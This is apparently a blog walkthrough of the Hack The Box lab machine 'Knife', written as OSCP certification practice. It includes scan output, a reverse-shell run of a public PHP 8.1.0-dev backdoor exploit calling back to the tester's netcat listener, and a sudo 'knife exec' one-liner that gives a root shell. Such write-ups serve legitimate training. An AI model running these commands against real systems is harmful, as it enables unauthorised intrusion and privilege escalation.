Path to OSCP: Knife
As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.
Next up is Knife. We fire up nmap:
u01@nostromo:~$ nmap -p- -A knife.htb -oA HTB/knife/knife Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 14:04 IST Nmap scan report for knife.htb (10.10.10.242) Host is up (0.044s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA) | 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA) |_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Emergent Medical Idea |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 38.17 seconds
The webpage shows the home of a healthcare company:
All “links” are just plain text. There’s nothing of interest in the page source. We try ffuf and gobuster for directory enumeration with various different settings, but can’t find anything of interest.
I kick off a basic Nikto scan to see if it can highlight anything of interest:
u01@nostromo:~$ nikto -host knife.htb - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 10.10.10.242 + Target Hostname: knife.htb + Target Port: 80 + Start Time: 2023-09-15 16:24:20 (GMT1) --------------------------------------------------------------------------- + Server: Apache/2.4.41 (Ubuntu) + /: Retrieved x-powered-by header: PHP/8.1.0-dev. + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch. + /: Web Server returns a valid response with junk HTTP methods which may cause false positives. + 7962 requests: 0 error(s) and 5 item(s) reported on remote host + End Time: 2023-09-15 16:29:56 (GMT1) (336 seconds) ---------------------------------------------------------------------------
It shows that PHP 8.1.0-dev is in use. A quick Google of this version brings me to php-8.1.0-dev-backdoor-rce | PHP 8.1.0-dev Backdoor System Shell Script (flast101.github.io), which details a backdoor for this particular PHP version. “If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agent header”. I clone the repo, and using the reverse shell variant of the exploit we get a reverse shell to a listening netcat as user james and retrieve the user.txt flag:
u01@nostromo:/repo/php-8.1.0-dev-backdoor-rce$ python revshell_php_8.1.0-dev.py http://knife.htb 10.10.14.2 7777
u01@nostromo:~$ nc -lvnp 7777 listening on [any] 7777 ... connect to [10.10.14.2] from (UNKNOWN) [10.10.10.242] 34682 bash: cannot set terminal process group (1033): Inappropriate ioctl for device bash: no job control in this shell james@knife:~$ ls -l ~/user.txt ls -l ~/user.txt -r-------- 1 james james 33 Sep 15 12:58 /home/james/user.txt
Checking james’ sudo permissions, he can run /usr/bin/knife as root without providing a password:
james@knife:~$ sudo -l sudo -l Matching Defaults entries for james on knife: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User james may run the following commands on knife: (root) NOPASSWD: /usr/bin/knife james@knife:~$
“Knife is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server”. We check old reliable GTFOBins for any privilege escalation path using sudo permissions with knife, and sure enough there’s a straightforward drop to root shell:
We obtain root using this method and can retrieve the root.txt flag:
james@knife:/$ sudo knife exec -E 'exec "/bin/sh"' sudo knife exec -E 'exec "/bin/sh"' id uid=0(root) gid=0(root) groups=0(root) ls -l /root/root.txt -r-------- 1 root root 33 Sep 15 12:58 /root/root.txt
Takeaway for OSCP
This was a very straightforward box, not a huge amount to takeaway here, other than the useful perspective using an alternative information gathering tool can give you.